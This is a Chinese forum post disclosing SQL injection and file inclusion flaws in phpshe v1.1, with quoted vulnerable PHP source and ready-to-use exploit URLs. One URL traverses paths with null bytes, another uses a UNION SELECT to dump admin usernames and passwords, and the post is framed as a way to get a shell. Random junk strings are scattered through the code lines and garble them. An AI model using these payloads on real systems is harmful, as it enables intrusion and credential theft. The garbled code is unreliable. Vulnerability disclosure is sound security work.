找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2438|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/. W, t- w% ~3 S# [* K7 k
/* Phpshe v1.1 Vulnerability  g" m1 o' |8 d) G) C% b2 M
/* ========================3 Z! c7 G$ W" o$ d5 e" y
/* By: : Kn1f3
+ x: y; Q* N8 ^3 o/* E-Mail : 681796@qq.com( L+ K4 U; `" O  ?- T4 D
/*******************************************************/  _7 ]1 d( B, z% e6 x- s
0×00 整体大概参数传输
6 _1 S  l; z# t$ L
: T" I8 b2 q1 b8 \0 M3 C" x( ]3 l' ~  C/ ?, T2 K6 G; i& n* N" v

7 y; e( M2 A. w: K1 ^: _& Y//common.php0 a7 K1 L3 ~  Y+ j$ a. C) p
if (get_magic_quotes_gpc()) {
8 L! p6 \+ m" y. R/ q9 W!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');) \9 l/ m1 R7 Q, d! p, y$ }5 f
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
' `8 ]7 z1 e0 D! Z# ^}
5 E8 T# P$ E: Melse {& Q+ d3 G( K8 Z% z# r6 x: I
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
' ], O; s: s3 Q+ I8 ^/ q& V!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');4 S; r. h' N# s* n8 a: P: F
}6 A, c0 s' @  q4 E7 z
session_start();% |: y* h  s9 ~
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
& @& e1 G! x' P!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');! X5 U& s' B  n$ X

3 i# {- p) f" V" g% C. T% Z0×01 包含漏洞
1 e' T+ W- X! A, J5 z 2 t/ I0 `2 M  _7 U9 v2 d
+ U$ a8 y: L# b& }  c, q
//首页文件
7 L" s+ o4 t4 Y<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);$ c+ u$ o; {! N) N) c
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
$ [# U1 {  M" P+ z0 L" dpe_result();, i( n% [- t( D; u- d
?>% c8 K+ A: L- o. O5 p
//common 文件 第15行开始
$ x1 F. q+ O' Y$ R/ Iurl路由配置6 U; {) T9 v1 d3 M
$module = $mod = $act = 'index';
( R! j! ^' Z4 g* ]. t4 n7 m; G' v$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
4 \' |' O" e& ^+ ^5 m! s* `1 f* U7 v$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
9 E0 y* V; ]  U- Z$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
2 M3 w! u. l: f9 \& f' Q5 Y//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00. ~8 L7 T( }1 L$ c8 ?' F


$ V- |' s& e0 v4 b+ K5 W  V- L
2 Y# t% X" w' _# u: u# c+ w, L9 m 0×02 搜索注入
, |% j; u, @* u" W) w8 E9 {
% k; ^% }& b0 [/ |<code id="code2">

//product.php文件8 }2 n) X4 i6 m8 K' z% V
case 'list':
' o$ W, p5 H3 L" I* w$category_id = intval($id);5 p2 P9 e% D# g8 g0 N
$info = $db->pe_select('category', array('category_id'=>$category_id));7 }' ?' p* P6 n+ P" E0 b! v
//搜索
1 l+ }2 {  E, @  Y9 y5 p( g0 D% x$sqlwhere = " and `product_state` = 1";
4 d7 Q% M6 q5 s. Upe_lead('hook/category.hook.php');3 ?( L# ]& \/ B  {& z) Q
if ($category_id) {
, }. j3 |, X; u2 o) |0 Ewhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
9 @. m) g' r9 G- D  H}5 J( }6 a$ _! [% m3 O+ \# w; H& l+ s
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
  s, q0 d- b- N. N# Jif ($_g_orderby) {
% o. }0 x5 a7 {# b/ y, Y5 S$orderby = explode('_', $_g_orderby);) T2 k$ f! Z9 @+ A# ?/ T
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
9 Y2 o' ^6 z0 y8 @3 O}
( I. y: T7 C: D5 L' Lelse {) o* g" p$ @8 N" u$ A; Z& Q4 r
$sqlwhere .= " order by `product_id` desc";* g) ^& v! t. K! m: u# V" y- }3 `2 d
}" D8 U% V/ y8 D
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));4 r) z0 D0 P. c& K1 ]
//热卖排行
6 w3 n; t! E- w& z$product_hotlist = product_hotlist();$ D$ i; W6 L; m5 O) k
//当前路径$ c& Z; ~: Z( t3 a7 ^5 l
$nowpath = category_path($category_id);9 P; ]3 S3 J7 Y: z9 N2 O' A( P
$seo = pe_seo($info['category_name']);
, b3 p4 i0 b( P) K# b0 \- zinclude(pe_tpl('product_list.html'));0 Q1 H: {6 |4 Z9 E" {
//跟进selectall函数库
7 Z9 P" X0 ^" _, _3 O* Mpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
# K  `5 l" t! w+ v# ], i9 ]3 D{0 W1 j2 ~2 J1 y! z3 L
//处理条件语句
  T9 c' S6 {( s& l* v$sqlwhere = $this->_dowhere($where);/ b  y! S8 e! I6 ^
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);  W) o1 `( k$ O& T
}0 g* n* e( S$ m' z8 x
//exp
  w, l5 g5 U7 s! W- Y' Oproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1  z* O$ X3 m3 A& e- O( k) P

</code>+ X2 B. z& @- l9 ?9 B1 W* K3 [
; d, ~! T* e2 g- r4 o7 p
0×03 包含漏洞23 D$ S9 y. E$ G- m! u: b

4 p! K# Q1 c* D9 Y5 c<code id="code3">

//order.php

case 'pay':

6 s1 m) c& a3 Q6 Y
$order_id = pe_dbhold($_g_id);


  B& _' o2 c( s$cache_payway = cache::get('payway');


* G+ x# c: k0 O3 O% X; _. \foreach($cache_payway as $k => $v) {


2 x$ d$ ?2 r7 w5 l: u, S$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

# O& |+ R  B) }
if ($k == 'bank') {

5 [7 }* Y+ c! z& z
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


6 o) |" r  S3 X6 D9 r& M5 K}

/ M. p* k: P/ _; G6 S
}

* s$ b1 b+ J) j& {$ N
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

& L2 `4 N$ d2 E% P# e. `* b
!$order['order_id'] && pe_error('订单号错误...');

" c5 \" Z, K' d, N
if (isset($_p_pesubmit)) {


& ~% E; I8 S- a4 Rif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


6 @! ?7 U9 ]; `$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


# L" b; a1 y3 a8 Kforeach ($info_list as $v) {

  }. m( |& h4 L3 I' p! y; z
$order['order_name'] .= "{$v['product_name']};";
1 M7 j5 W4 S% E3 W


2 C9 f+ b* n" }}

' e1 n' V0 h0 u
echo '正在为您连接支付网站,请稍后...';

/ v) p) C; `  `  @
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


- `* w/ q: L. i) ]5 \7 H}//当一切准备好的时候就可以进行"鸡肋包含了"


9 p8 W% F! U9 Q. l& Celse {


7 B9 I$ b/ F$ H' C" a/ {pe_error('支付错误...');


1 r; {0 w% a) }, ?$ Y}

: N9 H3 e: _0 L- Q( X4 t% y/ z
}

& I+ P' D9 Z2 _6 s$ m! W" F; [
$seo = pe_seo('选择支付方式');

- a  }% ^& z) f- G. \7 z& f9 w
include(pe_tpl('order_pay.html'));


) l5 e& L) n9 L- }break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
+ ^0 z  \& Z+ t' w1 K# v% U! a8 A! _

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表